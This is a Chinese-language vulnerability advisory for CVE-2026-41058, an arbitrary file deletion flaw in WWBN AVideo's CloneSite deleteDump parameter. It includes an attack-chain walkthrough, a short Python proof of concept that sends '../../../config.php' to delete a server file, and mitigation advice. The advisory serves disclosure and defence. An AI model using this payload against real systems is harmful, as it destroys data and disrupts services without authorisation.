CVE-2026-41058 CVSS 8.1 高危

CVE-2026-41058 WWBN AVideo 任意文件删除漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41058

漏洞类型

任意文件删除

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台，其29.0及以下版本存在严重安全漏洞。该漏洞源于CloneSite功能对`deleteDump`参数的修复不完整，未能有效过滤路径遍历字符。攻击者可通过发送特制的GET请求，利用`../../`序列绕过限制，调用`unlink()`函数删除服务器上的任意文件。此漏洞可能导致关键数据丢失，严重威胁系统的完整性和可用性。

技术细节

该漏洞属于典型的路径遍历导致的任意文件删除漏洞。在受影响的WWBN AVideo版本中，开发者虽然尝试修复CloneSite模块的问题，但针对`deleteDump`参数的过滤机制存在逻辑缺陷，未能正确处理路径遍历字符。具体而言，后端代码直接将用户可控的GET参数传递给PHP的`unlink()`函数，且未对输入进行充分的规范化或校验。攻击者只需具备低权限账号，即可构造包含`../../`序列的恶意请求，利用`unlink()`函数删除服务器上Web用户有权限访问的任意文件。这可能导致系统配置文件被删、应用程序崩溃或关键数据丢失，严重影响系统的完整性和可用性。鉴于其网络攻击向量和低利用复杂度，该漏洞风险较高。

攻击链分析

STEP 1

侦察

攻击者识别出目标站点使用的是WWBN AVideo平台，且版本在29.0及以下。

STEP 2

获取权限

攻击者注册或获取一个低权限用户账户（PR:L），满足漏洞利用的最低权限要求。

STEP 3

漏洞利用

攻击者向CloneSite接口发送特制的GET请求，在`deleteDump`参数中注入`../../`路径遍历序列，指向服务器上的敏感文件。

STEP 4

执行攻击

服务器后端接收请求，由于未正确过滤，直接调用`unlink()`函数删除了攻击者指定的文件。

STEP 5

达成效果

目标文件被删除，导致系统功能异常、数据丢失或服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target.com/objects/cloneSite.json.php"

# The vulnerable parameter 'deleteDump' accepts path traversal sequences
# Example payload to delete a configuration file
payload = {
    "deleteDump": "../../../config.php"
}

try:
    print("[*] Attempting to delete file using CVE-2026-41058...")
    response = requests.get(target_url, params=payload)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if file was deleted.")
    else:
        print(f"[-] Unexpected status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

WWBN AVideo <= 29.0

防御指南

临时缓解措施

建议立即升级到修复该漏洞的最新版本。如果不能立即升级，应严格限制对CloneSite功能的访问权限，并在WAF（Web应用防火墙）中部署规则，拦截包含`../`或`../../`序列的请求参数，以防止路径遍历攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表